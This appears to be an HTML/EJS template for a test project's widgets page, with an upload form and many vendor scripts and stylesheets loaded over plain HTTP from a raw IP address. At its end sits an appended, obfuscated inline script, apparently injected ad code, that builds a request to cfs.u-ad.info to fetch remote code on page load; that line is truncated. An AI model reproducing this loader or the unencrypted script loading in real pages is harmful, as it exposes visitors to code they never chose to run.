<!DOCTYPE html>
<!--[if IE 9 ]><html class="ie9"><![endif]-->
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>TEST PROJECT</title>

        <link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet' type='text/css'>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css">


        <!-- Vendor CSS -->
        <link href="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/svendors/bower_components/fullcalendar/dist/fullcalendar.min.css" rel="stylesheet">
        <link href="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/animate.css/animate.min.css" rel="stylesheet">
        <link href="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/bootstrap-sweetalert/lib/sweet-alert.css" rel="stylesheet">
        <link href="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/material-design-iconic-font/dist/css/material-design-iconic-font.min.css" rel="stylesheet">



        <!-- CSS -->
        <link href="http://192.185.228.226/projects/ma/1-5-1/jquery/css/app.min.1.css" rel="stylesheet">
        <link href="http://192.185.228.226/projects/ma/1-5-1/jquery/css/app.min.2.css" rel="stylesheet">

    </head>
    <body>
        <header id="header">
            <ul class="header-inner">
                <li id="menu-trigger" data-trigger="#sidebar">
                    <div class="line-wrap">
                        <div class="line top"></div>
                        <div class="line center"></div>
                        <div class="line bottom"></div>
                    </div>
                </li>

                <li class="logo hidden-xs">
                    <a href="index.html">TEST PROJECT</a>
                </li>

                <li class="pull-right">
                <ul class="top-menu">


                  </li>

                    <li class="hidden-xs">
                        <a class="zmdi zmdi-close zmdi-hc-3x" href="/logout" title="Log Out"></a>

                    </li>
                </li>
            </ul>

            <!-- Top Search Content -->
            <div id="top-search-wrap">
                <input type="text">
                <i class="zmdi zmdi-close"></i>

            </div>
        </header>

        <section id="content">
               <div class="container">
                   <div class="block-header">
                       <h2>Widgets</h2>
                   </div>

                   <div class="card">
                      <div class="card-header">
                          <h2>Add Something <small> Add something to the card or space below!
</small></h2>
                      </div>

                      <div class="card-body card-padding">
                        <form role="form" method="post" enctype="multipart/form-data" action="/test">
                          <div class="form-group fg-line">
                            <label for="title">Title</label>
                            <input type="title" class="form-control input-sm" id="title" name="title" placeholder="Title">
                          </div>
                          <div class="form-group fg-line">
                            <label for="desc">Description</label>
                            <input type="description" class="form-control input-sm" id="description" name="description" placeholder="Description">
                          </div>
                          <div class="form-group fg-line">
                            <label for="url">Image URL</label>
                            <input type="file" name="imageurl">
                          </div>
                          <button type="submit" class="btn btn-default">Submit</button>
                        </form>
                      </div>
                  </div>


                   <div class="col-sm-4" id="id1">
                       <!-- Picture List -->




                   </div>

                   <div class="col-sm-4" id="id2">
                       <!-- Tabs -->




                   </div>

                   <div class="col-sm-4" id="id3">



                   </div>
               </div>
           </section>
       </section>

        <!-- Older IE warning message -->
        <!--[if lt IE 9]>
            <div class="ie-warning">
                <h1 class="c-white">Warning!!</h1>
                <p>You are using an outdated version of Internet Explorer, please upgrade <br/>to any of the following web browsers to access this website.</p>
                <div class="iew-container">
                    <ul class="iew-download">
                        <li>
                            <a href="http://www.google.com/chrome/">
                                <img src="img/browsers/chrome.png" alt="">
                                <div>Chrome</div>
                            </a>
                        </li>
                        <li>
                            <a href="https://www.mozilla.org/en-US/firefox/new/">
                                <img src="img/browsers/firefox.png" alt="">
                                <div>Firefox</div>
                            </a>
                        </li>
                        <li>
                            <a href="http://www.opera.com">
                                <img src="img/browsers/opera.png" alt="">
                                <div>Opera</div>
                            </a>
                        </li>
                        <li>
                            <a href="https://www.apple.com/safari/">
                                <img src="img/browsers/safari.png" alt="">
                                <div>Safari</div>
                            </a>
                        </li>
                        <li>
                            <a href="http://windows.microsoft.com/en-us/internet-explorer/download-ie">
                                <img src="img/browsers/ie.png" alt="">
                                <div>IE (New)</div>
                            </a>
                        </li>
                    </ul>
                </div>
                <p>Sorry for the inconvenience!</p>
            </div>
        <![endif]-->

        <!-- Javascript Libraries -->
        <script>
          var email = "<%= user.local.email %>";
        </script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/jquery/dist/jquery.min.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>

        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/flot/jquery.flot.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/flot/jquery.flot.resize.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/flot.curvedlines/curvedLines.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/sparklines/jquery.sparkline.min.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/jquery.easy-pie-chart/dist/jquery.easypiechart.min.js"></script>

        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/moment/min/moment.min.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/fullcalendar/dist/fullcalendar.min.js "></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/simpleWeather/jquery.simpleWeather.min.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/jquery.nicescroll/jquery.nicescroll.min.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/Waves/dist/waves.min.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bootstrap-growl/bootstrap-growl.min.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/vendors/bower_components/bootstrap-sweetalert/lib/sweet-alert.min.js"></script>

        <!-- Placeholder for IE9 -->
        <!--[if IE 9 ]>
            <script src="vendors/bower_components/jquery-placeholder/jquery.placeholder.min.js"></script>
        <![endif]-->

        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/js/flot-charts/curved-line-chart.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/js/flot-charts/line-chart.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/js/charts.js"></script>

        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/js/charts.js"></script>
        <script src="http://192.185.228.226/projects/ma/1-5-1/jquery/js/functions.js"></script>


        <script src="js/test-project.js"></script>


    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bb2WaqJinQH1odwmL2K5Sa5WYuNLdTZwewwOwhEvNUXmPgL8W4NWti2l...(line truncated)...
  </html>
